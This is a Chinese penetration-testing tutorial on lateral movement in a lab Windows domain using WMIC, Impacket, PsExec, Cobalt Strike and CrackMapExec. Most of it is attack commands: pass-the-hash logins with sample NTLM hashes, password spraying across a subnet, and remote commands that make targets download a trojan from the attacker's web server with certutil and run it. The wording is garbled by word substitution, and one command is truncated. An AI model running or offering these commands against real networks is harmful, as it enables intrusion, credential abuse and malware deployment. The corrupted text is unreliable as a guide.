第129天：内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket ...

这里这个情况继承上一篇文章搭建的情况

案例一： 域横向移动-WMI-自带&下令&套件&插件

起首上线win2008

起首提权到system权限

wmic是windows自带的下令，可以通过135端口进行连接利用，只支持明文方式，长处是不用上传别的东西，缺点是无回显。
利用system权限抓取明文密码和hash密码

直接获得了域控管理员的账号密码

探测存活主机 

进一步的信息收集上一篇文章写过
win2008开启监听并生成木立刻传到本地web服务器

wmic 

利用wmic下令去连接别的主机，让目标主机去下载木马

1. wmic /node:目标ip /user:账号 /password:密码 process call create "执行命令"
2. wmic /node:192.168.3.30 /user:administrator /password:admin@123 process call create "certutil -urlcache -split -f http://192.168.3.20/2.exe 2.exe"

复制代码

连接乐成一样平常只有这种显示

乐成上传

让他执行

乐成上线

缺点就是没有任何回显
cscript

项目地点：https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs
特点是会反弹一个新的窗口就导致没有办法在cs当中去运行，类似反弹shell，并且得借助一个vbs文件，且不支持hash

在3.20（win2008主机）上运行

1. cscript //nologo wmiexec.vbs /shell 192.168.3.30 账号 密码
2. cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator 123.com

复制代码

弹过来的新窗口反弹的ip为3.30

wmiexec-impacket

下载地点
   1、Py版：https://github.com/SecureAuthCorp/impacket
python atexec.py god/administrator:Admin12345@192.168.3.21 “ver”
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 “whoami”
  2、Exe版：https://gitee.com/RichChigga/impacket-examples-windows
  这种方式又拥有回显，又可以适配cs
生成代理节点

这里由于我是linux情况直接执行py文件，exe文件一个原理

1. wmiexec ./账号:密码@ip "命令"
2. wmiexec 域名/账号:密码@ip "命令"
3. wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"

复制代码

实验使用域控的hash进行连接

1. wmiexec -hashes :hash值 (域名或者.)/账号@192.168.3.40 "whoami"

复制代码

执行上线

1. proxychains4 python wmiexec.py -hashes :afffeba176210fa/administrator@192.168.3.40 "certutil -urlcache -split -f h c:/222.exe & c:/222.exe"

复制代码

案例二:  域横向移动-SMB-自带&下令&套件&插件

利用的是smb开放的445端口
下令

项目地点：PsTools - Sysinternals | Microsoft Learn
psexe也是反弹一个cmd以是不能直接在cs当中运行

1. windows官方用法
2. psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd

复制代码

这里由于我是linux系统以是我直接把文件拖入win2008进行运行，并且运行该文件的时候cmd权限必须为admin，这里也可以用socks代理执行，并且权限已经是system可以执行。
20执行获得30的cmd

套件

使用套件中的psexec

1. wmi套件中
2. psexec.py ./administrator:123.com@192.168.3.30
3. psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.30

复制代码

套件当中尚有一个smbexec.py文件

1. python smbexec.py ./administrator:123.com@192.168.3.40
2. python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator@192.168.20.30  

复制代码

同样也是会弹出一个新的cmd会话

 
cs自带

先需要设置转发上线，由于内网不出网

选择域控密码，大概主秘密码

域控上线

 利用psexec64+主机hash值上线win7

由于这里我所有主机都是一个密码，以是直接选这个，记得他会自动加上win2008的域，记得删除，然后就是提醒我们在内网渗出过程当中要实验切换域内用户的登录方式，大部分会自动加上域

乐成上线

案例三： 域横向移动-工具-Proxychains&CrackMapExec

这里proxychains我一直在用，不做过多先容了
crackmapexec下载地点：（kali自带）GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks
根本用法

探测存活主机

1. crackmapexec smb 192.168.3.10-40 #探测存活主机

复制代码

密码喷射域登录

1. crackmapexec smb 192.168.3.10-40 -u jie -p 123.com

复制代码

这里由于我没有把密码和主机进行绑定，以是域内所有主机都可以用这个密码登录

密码喷射本地登录

1. crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth

复制代码

密码喷射本地登录加执行下令

1. crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth -x "whoami"

复制代码

实验上线,记得设置转发上线，ip需要设置为内网ip

 利用下面的下令下载web服务器中的木马，并实验运行上线

1. crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com -x "certutil -urlcache -split -f http://192.168.3.20/2.exe c:/zzzzz.exe & c:/zzzzz.exe"

复制代码

 除了域控主机之外都上线了，切换域控密码喷射

高阶玩法

当收集到一台域内主机以后，可以实验把收集到的密码，用户都写入字典当中
注意收集用户的时候不能用提权的账户，需要用域内账户

这里密码我根本上都是123.com

运行，这里注意要加一个参数，否则运行一个乐成匹配后就不会继承往下运行

1. --continue-on-success

复制代码

用字典密码去匹配

这个加continue参数好像只可以或许匹配密码，不能全上线，不加参数的话又指挥上线一个就掉了，不太懂了，可以匹配出来密码，用账号密码，一个一个去上线？

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。